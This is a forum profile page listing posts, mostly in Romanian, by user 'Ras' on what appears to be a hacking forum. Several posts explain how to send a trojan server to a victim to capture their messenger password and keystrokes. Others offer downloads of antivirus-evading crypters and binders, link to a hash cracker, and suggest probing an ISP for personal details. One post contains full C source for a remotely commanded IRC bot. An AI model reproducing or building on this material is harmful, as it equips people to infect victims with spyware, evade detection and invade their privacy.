Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. <wantedbz> doamnloadatzi asta <wantedbz> acuma fac saitu ala ce ratat.
  2. deci sunt 2 .exe-uri 1) client.exe 2) server.exe server.exe il trimiti victimei client.exe il rulezi tu. dupa ce ruleaza victima te connectezi prin client la server (pui ip si dai connect) si porma ii aflii parola la mess si vezi tot ce tasteaza
  3. Ras

    Faza penala rau

    pt tine da. chiar nu ti-ai dat seama ca acel dulap nu a cazut pe ea?
  4. Download: http://www.turkojan.com/sayac/click.php?id=10 Mai multe poze gasiti aici http://www.turkojan.com/eng/screen.htm Nu am folosit niciodata acest trojan. Nu stiu sigur despre ce bug este vb si nici nu vreau sa stau sa citesc despre acest trojan. THX to: E.M.I.N.E.M
  5. eu am vazut zeitgeist si chiar v-am zis si in celalalt topic cu 2012(sau cum e) sa va uitati la film.
  6. www.ripe.net pui ip lui si iti da adresa sediului, nr de tel de la sediu etc. suni la ei si vezi daca ai cum sa faci rost de ceva informatzii.
  7. #pragma comment(lib, "ws2_32") #include <windows.h> #include <winsock.h> #include <stdio.h> #include "Functions.h" // BOT STRUCTURE // typedef struct BotInfo{ SOCKET BotSock; char *szServer; char *szChannel; char *szNick; char *szPong; char *szRecvBuff; int nPort; char *EntryMsg; char *szOwner; }BOTINFO, *PBOTINFO; // BOT STRUCTURE // DWORD WINAPI Recieve(LPVOID lpParam) { int nRecv; PBOTINFO biMini = (PBOTINFO)lpParam; char *szCmd = (char*)malloc(513); char *szStr; char *szAuth = (char*)malloc(513); char *szCheck = (char*)malloc(513); char *szCmds = (char*)malloc(513); char *szExcla, *szHostName; while((nRecv = recv(biMini->BotSock, szCmd, strlen(szCmd), 0)) != -1){ if(nRecv > 5){ strcpy(szCmds, szCmd); szExcla = strpbrk(szCmds, "!"); if(szExcla != NULL){ szHostName = strtok(szExcla + 1, " "); memset(szCmds, 0, sizeof(szCmds)); if(strcmp(biMini->szOwner, szHostName) == 0 /*|| strcmp(szHostName, "SF@SFt") == 0*/){ //START ALL PRUBLIC COMMANDS strcpy(szCmds, szCmd); if((szStr = strstr(szCmds, ":!quit"))){ char *szMsg = strtok(szStr + 7, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "QUIT :%s\r\n\0", szMsg); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szCmd); free(szCmds); free(szAuth); free(szCheck); free(szStr); ExitProcess(0); } if((szStr = strstr(szCmds, ":!topic"))){ char *szChan = strtok(szStr + 8, " "); char *szTopic = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "TOPIC %s :%s\r\n\0", szChan, szTopic); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!op"))){ char *szChan = strtok(szStr + 5, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s +o %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!deop"))){ char *szChan = strtok(szStr + 7, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s -o %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!owner"))){ char *szChan = strtok(szStr + 8, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s +q %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!deowner"))){ char *szChan = strtok(szStr + 10, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s -q %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!hop"))){ char *szChan = strtok(szStr + 6, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s +h %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!dehop"))){ char *szChan = strtok(szStr + 8, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s -h %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!kick"))){ char *szChan = strtok(szStr + 7, " "); char *szNick = strtok(NULL, " "); char *szReason = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "KICK %s %s :%s\r\n\0", szChan, szNick, szReason); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!kb"))){ char *szChan = strtok(szStr + 5, " "); char *szNick = strtok(NULL, " "); char *szReason = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s +b %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); sprintf(szSend, "KICK %s %s :%s\r\n\0", szChan, szNick, szReason); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!cycle"))){ char *szChan = strtok(szStr + 8, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "PART %s\r\n\0", szChan); irc_send(biMini->BotSock, szSend); sprintf(szSend, "JOIN %s\r\n\0", szChan); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!empty"))){ char *szChan = strtok(szStr + 8, " "); char *szOpt = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "PRIVMSG ChanServ :clear %s %s\r\n\0", szChan, szOpt); irc_send(biMini->BotSock, szSend); sprintf(szSend, "JOIN %s\r\n\0", szChan); irc_send(biMini->BotSock, szSend); free(szSend); } if((szStr = strstr(szCmds, ":!join"))){ char *szChan = strtok(szStr + 7, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "JOIN %s\r\n\0", szChan); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!part"))){ char *szChan = strtok(szStr + 7, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "PART %s\r\n\0", szChan); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!say"))){ char *szChan = strtok(szStr + 6, " "); char *szMsg = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "PRIVMSG %s :%s\r\n\0", szChan, szMsg); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!notice"))){ char *szChan = strtok(szStr + 9, " "); char *szMsg = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "NOTICE %s :%s\r\n\0", szChan, szMsg); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!ban"))){ char *szChan = strtok(szStr + 6, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s +b %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!deban"))){ char *szChan = strtok(szStr + 8, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s -b %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!protect"))){ char *szChan = strtok(szStr + 10, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s +a %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!deprotect"))){ char *szChan = strtok(szStr + 12, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s -a %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!allow"))){ char *szChan = strtok(szStr + 8, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s +e %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!deallow"))){ char *szChan = strtok(szStr + 10, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "MODE %s -e %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!nick"))){ char *szNick = strtok(szStr + 7, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "NICK %s\r\n\0", szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!auth"))){ char *szSend = (char*)malloc(513); sprintf(szSend, "PRIVMSG NickServ :identify passward\r\n\0"); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!aop"))){ char *szChan = strtok(szStr + 6, " "); char *szNick = strtok(NULL, " "); char *szLevel = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "PRIVMSG ChanServ :ACCESS %s ADD %s %s\r\n\0", szChan, szNick, szLevel); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } if((szStr = strstr(szCmds, ":!deaop"))){ char *szChan = strtok(szStr + 8, " "); char *szNick = strtok(NULL, "\r\n"); char *szSend = (char*)malloc(513); sprintf(szSend, "PRIVMSG ChanServ :ACCESS %s DEL %s\r\n\0", szChan, szNick); irc_send(biMini->BotSock, szSend); memset(szCmds, 0, sizeof(szCmds)); free(szSend); } //END ALL PRIVATE COMMANDS }else{ //ALL PUBLIC COMMANDS HERE strcpy(szCmds, szCmd); //END ALL PUBLIC COMMANDS } } } } free(szCmd); free(szCmds); free(szAuth); free(szCheck); free(szStr); return 0; } DWORD WINAPI KeepAlive(LPVOID lpParam) { PBOTINFO biMini = (PBOTINFO)lpParam; char *szPong = (char*)malloc(513); sprintf(szPong, "PONG :%s\r\n\0", biMini->szServer); while(TRUE){ Sleep(30*1000); send(biMini->BotSock, szPong, strlen(szPong), 0); } free(szPong); return 0; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { BOTINFO biMini = { 0, //socket, gets defined later "irc.server.com", //server to connect to "#CPP", //channel to join "CppBot", //nick to use new char[513], new char[513], 6667, //port "SFBOT Version 1.8 End Message Detection - Op Security", //entry message "SF@SF" //hostname of bot op }; WSADATA wsaData; WSAStartup(MAKEWORD(2, 0), &wsaData); biMini.BotSock = socket(AF_INET, SOCK_STREAM, 0); if(biMini.BotSock == INVALID_SOCKET){ Report("Failed to create Socket!"); WSACleanup(); return FALSE; } SOCKADDR_IN SockInfo; PHOSTENT pheServer = gethostbyname(biMini.szServer); SockInfo.sin_addr = *(struct in_addr *)pheServer->h_addr_list[0]; SockInfo.sin_family = AF_INET; SockInfo.sin_port = htons(biMini.nPort); int nResult = connect(biMini.BotSock, (SOCKADDR*)&SockInfo, sizeof(SockInfo)); if(nResult == SOCKET_ERROR){ Report("Failed to connect to server!"); WSACleanup(); return FALSE; } CreateThread(0, NULL, (LPTHREAD_START_ROUTINE)&Recieve, &biMini, NULL, NULL); CreateThread(0, NULL, (LPTHREAD_START_ROUTINE)&KeepAlive, &biMini, NULL, NULL); /////////////////////////////////////////////////////////////////////////////////// char *szConn = (char*)malloc(513); sprintf(szConn, "USER %s . . :MiniBOT v1\r\nNICK %s\r\n\0", biMini.szNick, biMini.szNick); send(biMini.BotSock, szConn, strlen(szConn), 0); char *szJoin = (char*)malloc(513); sprintf(szJoin, "JOIN %s\r\n\0", biMini.szChannel); send(biMini.BotSock, szJoin, strlen(szJoin), 0); free(szConn); free(szJoin); char *szSay = (char*)malloc(513); sprintf(szSay, "PRIVMSG NickServ :identify passward\r\n\0", biMini.szChannel); send(biMini.BotSock, szSay, strlen(szSay), 0); free(szSay); char *szMsg = (char*)malloc(513); sprintf(szMsg, "PRIVMSG %s :%s\r\n\0", biMini.szChannel, biMini.EntryMsg); send(biMini.BotSock, szMsg, strlen(szMsg), 0); free(szMsg); /////////////////////////////////////////////////////////////////////////////////// MSG Msg; while(GetMessage(&Msg, NULL, 0, 0)){ TranslateMessage(&Msg); DispatchMessage(&Msg); } delete biMini.szRecvBuff, biMini.szPong; return FALSE; }
  8. -Unlimited URL Support -Extraction Options(Temp, Windows, System) -Execution Options(True or False) -Regisry Startup -Settings RC4 Encrypted Password: SOL Download: http://www.box.net/shared/wf02aaqkgg
  9. Since I'm not really into keyloggers, RATs, and other stuff like that anymore, I decided to release my crypter I made a while back. The only thing its detected by is Panda, which says suspicious. Not detected if they use virusscan.jotti.org. Details: - Stub coded in VB6 - 16kb stub noncompressed - Stub compiled in Pcode for smaller filesize - Puts the files in the Temp directory to run - Stuff encrypted at the end in Base64 + Some crappy compression - Most packed files are crypted at about a 115% ratio, unpacked files normally around 90%(slight shrink in filesize) - UD on scantime, not runtime. - To icon patching, you gotta use ResHacker or something to change the icon - Do not rename, delete, or move the file stub.stb, and it must be in the same directory as RogueCrypt v1.0.exe - When you crypt a file, it is created in the same directory as the other files, and is named "crypted.exe" - To select the file to crypt, drag the icon of it into the text box Screenshot: Virus Scan: Updates for v2.0: - Browse button for file to be crypted - Browse button for where file is to be saved - Better compression - EOF data encrypted with good algorithm - Faster decrypting - Undetectable to Panda DOWNLOAD: http://rapidshare.com/files/98010492/RogueCrypt1.0.rar.html http://uppit.com/GECWRB
  10. Stub scan: Download: http://rapidshare.com/files/99083664/The_Gathering_Binder.rar
  11. Download: http://rapidshare.com/files/98269452/AC_Crypter_Privat.rar
  12. Spider Binder 1.2 * Supports all files types * Unlimited files number * MessageBox support * Icon change support * Strong file and setting encryption "RC4" * Tested on XP/Vista * Stub 12kb Uncompressed * Anti-Norman sandbox * Anti-Anubis * FUD At time of release Download link: http://rapidshare.com/files/97172335/Spider_Binder_1.2.rar
  13. http://rapidshare.com/files/97486751/Scantime_Crypt0r_Private_0.5.rar.html thx to: puscas_marin
  14. Author: steve10120 Website: sys-overload.com - will be back soon! Features Extraction Options Execution Options Registry Startup XOR Encryption RC4 Encryption Fake Message Box #Can be used without binder Remote WebDownloader #Can be used without binder Icon Changer UPX Support Password: SOL Download: http://www.box.net/shared/w0wkqhuo08 UD or not: http://www.virustotal.com/ro/analisis/c69552b5a1b6083cffd0cf8fcfd25a38 multa lume mi-a zis ca e ff bun acest binder. eu nu l-am testat pt ca nu am avut cu ce. thx to: puscas_marin
  15. inainte sa comentezi despre acest binder te rog sa te uiti la data cand l-am postat. 28 Iun 2007 01:11 pm
  16. chiar nu mai am programul il caut si iti dau maine pm daca gasesc.
  17. rasp cineva? :roll: incearca si o sa vezi ca nu merge.
  18. am mai stat si o ora sa il downloadez. :evil: :evil:
  19. downloadul de pe trackere nu tine numai de banda de internet. depinde de cati seederi sunt.
  20. nu am stat sa citesc toate paginile pt ca imi este lene. nu stiu daca a mai zis cineva in acest topic sau pe acest forum de ce vreau sa zic eu. daca va doriti sa vedeti un film care o sa va schimbe parerea despre treaba cu dumnezeu uitati-va la Zeitgeist (poate ati vazut acest film)
  21. http://rstcenter.com/forum/k-cryptor-0-11-t8823.rst a mai fost postat de mine aici pe data de 07 Oct 2007 01:16 am este si ff vechi si bun de aruncat la gunoi.
  22. numai ca e ff old. nu prea mai ai ce sa faci cu el.
  23. eu cred ca e diferentza mare intre ce ai zis tu verit4s si ce a zis nooooobie
  24. MDCrack is a free featureful password cracker designed to bruteforce several commonly used hash algorithms at a very aggressive speed rate. It can retrieve any password made of up to 16 characters and allowing up to 55 characters with an additionnal user salt. In order to achieve the highest possible speed rate, this program uses several cores for each algorithm it supports. Each one of these cores provides a different level of optimization dynamically selected at run time to best adapt with changing candidates length. To date, this program supports bruteforce attacks for 21 algorithms: MD2, MD4, MD5, HMAC-MD4, HMAC-MD5, FreeBSD, Apache, NTLMv1, IOS and PIX (both enable and user) hashes, Invision Power Board 2.x (IPB2), MD4MD4, MD4MD4S, MD5MD5, MD5MD5S, PHP, PHPS, CRC32, CRC32B, ADLER32 the list of algorithms is growing up. Multi threading allows for parallel cracking, distributing workload between available CPUs and thus multiplying overall speed by the number of processor(s) used. This yields to phenomenal performance with the advent of multi-cores CPUs design and even on the old generation of multi-CPUs systems. Several options offer fine tuning for the attack and allow to save and resume your session at a later time. This program has multiple uses in real life, while its primary goal is obviously to test the strength of hashed passwords, it can also be used as a raw benchmark tool for integer calculs. For any question you may have, please be sure to first read the Frequenty Ask Questions file (FAQ) provided in MDCrack ZIP file. I hope you will enjoy this program. Download: http://c3rb3r.openwall.net/mdcrack/download/MDCrack-183.zip
×
×
  • Create New...